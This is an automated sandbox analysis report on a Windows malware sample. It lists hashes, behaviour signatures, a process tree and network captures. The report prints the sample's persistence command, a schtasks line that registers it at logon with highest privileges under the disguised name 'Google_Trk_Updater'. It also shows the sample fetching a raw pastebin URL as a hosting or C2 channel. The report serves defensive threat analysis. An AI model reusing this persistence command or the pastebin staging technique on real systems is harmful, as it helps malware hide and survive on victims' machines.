Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/03/2024, 22:27 UTC

General

  • Target

    c443e51bf4e611c69c8dc61af63e5bb9.exe

  • Size

    506KB

  • MD5

    c443e51bf4e611c69c8dc61af63e5bb9

  • SHA1

    ae135b02a8a9ca36493be479994ccc1f458dc7ac

  • SHA256

    186077cdf16112f470f0dd4bc892f52879cf472be0107ebc0ccab33ae5cb0e03

  • SHA512

    9a20af1712a69a176d80edb4ed6a0cb508dcffae092f690df1c7806dc6464763e22358ddd2f9769130182e5c9a8ac03a04886ff31786e72be12908cd5d33060b

  • SSDEEP

    12288:44nC4MC1rb6/bTJ+YFYN439yTsIfD9D1ssBDJzUTVQHVX:44CfIWvV9QNOspCTVy

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe
    "C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe"
    1⤵
    • Suspicious behavior: RenamesItself
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:4648
    • C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe
      C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe
      2⤵
      • Deletes itself
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of UnmapMainImage
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /CREATE /RL HIGHEST /SC ONLOGON /TR "C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe" /TN Google_Trk_Updater /F
        3⤵
        • Creates scheduled task(s)
        PID:1372

Network

  • flag-us
    DNS
    133.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    9.228.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    9.228.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    0.204.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.204.248.87.in-addr.arpa
    IN PTR
    Response
    0.204.248.87.in-addr.arpa
    IN PTR
    https-87-248-204-0lhrllnwnet
  • flag-us
    DNS
    www.HWQ4EtOwHW.com
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    8.8.8.8:53
    Request
    www.HWQ4EtOwHW.com
    IN A
    Response
  • flag-us
    DNS
    w.google.com
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    8.8.8.8:53
    Request
    w.google.com
    IN A
    Response
    w.google.com
    IN CNAME
    www3.l.google.com
    www3.l.google.com
    IN A
    142.250.179.206
  • flag-nl
    GET
    http://w.google.com/
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    142.250.179.206:80
    Request
    GET / HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: */*, ???@, ??????????????
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
    Host: w.google.com
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1561
    Date: Tue, 12 Mar 2024 22:28:07 GMT
  • flag-us
    DNS
    pastebin.com
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    8.8.8.8:53
    Request
    pastebin.com
    IN A
    Response
    pastebin.com
    IN A
    104.20.68.143
    pastebin.com
    IN A
    104.20.67.143
    pastebin.com
    IN A
    172.67.34.170
  • flag-us
    DNS
    206.179.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.179.250.142.in-addr.arpa
    IN PTR
    Response
    206.179.250.142.in-addr.arpa
    IN PTR
    ams15s42-in-f141e100net
  • flag-us
    GET
    http://pastebin.com/raw/ubFNTPjt
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    104.20.68.143:80
    Request
    GET /raw/ubFNTPjt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: */*, ???@, ??????????????
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
    Host: pastebin.com
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Tue, 12 Mar 2024 22:28:07 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Tue, 12 Mar 2024 23:28:07 GMT
    Location: https://pastebin.com/raw/ubFNTPjt
    Server: cloudflare
    CF-RAY: 8637372a0f785324-LHR
  • flag-us
    GET
    https://pastebin.com/raw/ubFNTPjt
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    104.20.68.143:443
    Request
    GET /raw/ubFNTPjt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: */*, ???@, ??????????????
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
    Host: pastebin.com
    Response
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Mar 2024 22:28:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 4
    Server: cloudflare
    CF-RAY: 8637372e9e1f632b-LHR
  • flag-us
    DNS
    143.68.20.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    143.68.20.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    41.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.110.16.96.in-addr.arpa
    IN PTR
    Response
    41.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-41deploystaticakamaitechnologiescom
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    26.165.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.165.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    81.171.91.138.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.171.91.138.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
    Response
    0.205.248.87.in-addr.arpa
    IN PTR
    https-87-248-205-0lgwllnwnet
  • flag-us
    DNS
    173.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    173.178.17.96.in-addr.arpa
    IN PTR
    Response
    173.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-173deploystaticakamaitechnologiescom
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    23.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.236.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301576_1P4YPBOHIENGSX86I&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301576_1P4YPBOHIENGSX86I&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 279056
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 8F43E814060F4D3FABD2E86C7E6E9758 Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:49Z
    date: Tue, 12 Mar 2024 22:29:49 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301167_10EF6H5QJP57ZPZOD&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301167_10EF6H5QJP57ZPZOD&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 393346
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 5EEDA7E715934C6ABE612C3D5A5FDCCA Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:49Z
    date: Tue, 12 Mar 2024 22:29:49 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301728_1S5SOTBKRSIDGRZ37&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301728_1S5SOTBKRSIDGRZ37&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 258506
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: D3F0A48A84E54AB6AC390846C691FD71 Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:49Z
    date: Tue, 12 Mar 2024 22:29:49 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239339388213_1WCQ3PJBBE0FIXEBL&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239339388213_1WCQ3PJBBE0FIXEBL&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 89146
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 5A9DB69965374E999E9E7D9CE99E23C4 Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:50Z
    date: Tue, 12 Mar 2024 22:29:50 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301319_135UX7GSFYCP6UCBA&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301319_135UX7GSFYCP6UCBA&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 483933
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 6D07A0418B9B4039B16137D561B39C5F Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:52Z
    date: Tue, 12 Mar 2024 22:29:52 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239339388212_1DTNU2NAFQGIU7JBO&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239339388212_1DTNU2NAFQGIU7JBO&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 78844
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 89AD8E94A96A4A67AD178422A1174BF6 Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:53Z
    date: Tue, 12 Mar 2024 22:29:53 GMT
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001a-msedgenet
  • flag-us
    DNS
    122.10.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    122.10.44.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    122.10.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    122.10.44.20.in-addr.arpa
    IN PTR
    Response
  • 142.250.179.206:80
    http://w.google.com/
    http
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    462 B
    1.9kB
    5
    4

    HTTP Request

    GET http://w.google.com/

    HTTP Response

    404
  • 104.20.68.143:80
    http://pastebin.com/raw/ubFNTPjt
    http
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    474 B
    424 B
    5
    3

    HTTP Request

    GET http://pastebin.com/raw/ubFNTPjt

    HTTP Response

    301
  • 104.20.68.143:443
    https://pastebin.com/raw/ubFNTPjt
    tls, http
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    1.6kB
    4.9kB
    11
    9

    HTTP Request

    GET https://pastebin.com/raw/ubFNTPjt

    HTTP Response

    404
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.5kB
    8.1kB
    17
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.7kB
    549 B
    12
    7
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.6kB
    549 B
    14
    7
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239339388212_1DTNU2NAFQGIU7JBO&pid=21.2&w=1920&h=1080&c=4
    tls, http2
    60.4kB
    1.6MB
    1209
    1200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301576_1P4YPBOHIENGSX86I&pid=21.2&w=1080&h=1920&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301167_10EF6H5QJP57ZPZOD&pid=21.2&w=1920&h=1080&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301728_1S5SOTBKRSIDGRZ37&pid=21.2&w=1080&h=1920&c=4

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388213_1WCQ3PJBBE0FIXEBL&pid=21.2&w=1080&h=1920&c=4

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301319_135UX7GSFYCP6UCBA&pid=21.2&w=1920&h=1080&c=4

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388212_1DTNU2NAFQGIU7JBO&pid=21.2&w=1920&h=1080&c=4

    HTTP Response

    200
  • 8.8.8.8:53
    133.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    133.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    9.228.82.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    9.228.82.20.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    0.204.248.87.in-addr.arpa
    dns
    71 B
    116 B
    1
    1

    DNS Request

    0.204.248.87.in-addr.arpa

  • 8.8.8.8:53
    www.HWQ4EtOwHW.com
    dns
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    64 B
    137 B
    1
    1

    DNS Request

    www.HWQ4EtOwHW.com

  • 8.8.8.8:53
    w.google.com
    dns
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    58 B
    95 B
    1
    1

    DNS Request

    w.google.com

    DNS Response

    142.250.179.206

  • 8.8.8.8:53
    pastebin.com
    dns
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    58 B
    106 B
    1
    1

    DNS Request

    pastebin.com

    DNS Response

    104.20.68.143
    104.20.67.143
    172.67.34.170

  • 8.8.8.8:53
    206.179.250.142.in-addr.arpa
    dns
    74 B
    113 B
    1
    1

    DNS Request

    206.179.250.142.in-addr.arpa

  • 8.8.8.8:53
    143.68.20.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    143.68.20.104.in-addr.arpa

  • 8.8.8.8:53
    41.110.16.96.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    41.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    146 B
    159 B
    2
    1

    DNS Request

    228.249.119.40.in-addr.arpa

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    81.171.91.138.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    81.171.91.138.in-addr.arpa

  • 8.8.8.8:53
    26.165.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    26.165.165.52.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    0.205.248.87.in-addr.arpa
    dns
    71 B
    116 B
    1
    1

    DNS Request

    0.205.248.87.in-addr.arpa

  • 8.8.8.8:53
    173.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    173.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    57.169.31.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    57.169.31.20.in-addr.arpa

  • 8.8.8.8:53
    23.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    23.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    73 B
    106 B
    1
    1

    DNS Request

    200.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    122.10.44.20.in-addr.arpa
    dns
    142 B
    290 B
    2
    2

    DNS Request

    122.10.44.20.in-addr.arpa

    DNS Request

    122.10.44.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe

    Filesize

    506KB

    MD5

    9da25b89d9682c4f2c8595bfdde984d9

    SHA1

    1be8408709348b0942fbf25432736de967e77223

    SHA256

    3f008f99475e88cc71e92beb105a3f68c6c63538abb4021462ba3340a9e48e62

    SHA512

    7bef9dabf3fd9fbef240456c41536e26d25bc1b9b6842abf6130d3ee374af517044a8d2149e4267c0ed276544f70727b2b92161c4e074df50a124976e5fc921e

  • memory/2744-13-0x0000000000400000-0x0000000000483000-memory.dmp

    Filesize

    524KB

  • memory/2744-17-0x0000000000160000-0x00000000001E3000-memory.dmp

    Filesize

    524KB

  • memory/2744-20-0x0000000004F80000-0x0000000004FFE000-memory.dmp

    Filesize

    504KB

  • memory/2744-21-0x0000000000400000-0x000000000045B000-memory.dmp

    Filesize

    364KB

  • memory/2744-27-0x0000000000400000-0x000000000045B000-memory.dmp

    Filesize

    364KB

  • memory/4648-0-0x0000000000400000-0x0000000000483000-memory.dmp

    Filesize

    524KB

  • memory/4648-1-0x0000000001510000-0x0000000001593000-memory.dmp

    Filesize

    524KB

  • memory/4648-2-0x0000000000400000-0x000000000047E000-memory.dmp

    Filesize

    504KB

  • memory/4648-11-0x0000000000400000-0x000000000047E000-memory.dmp

    Filesize

    504KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.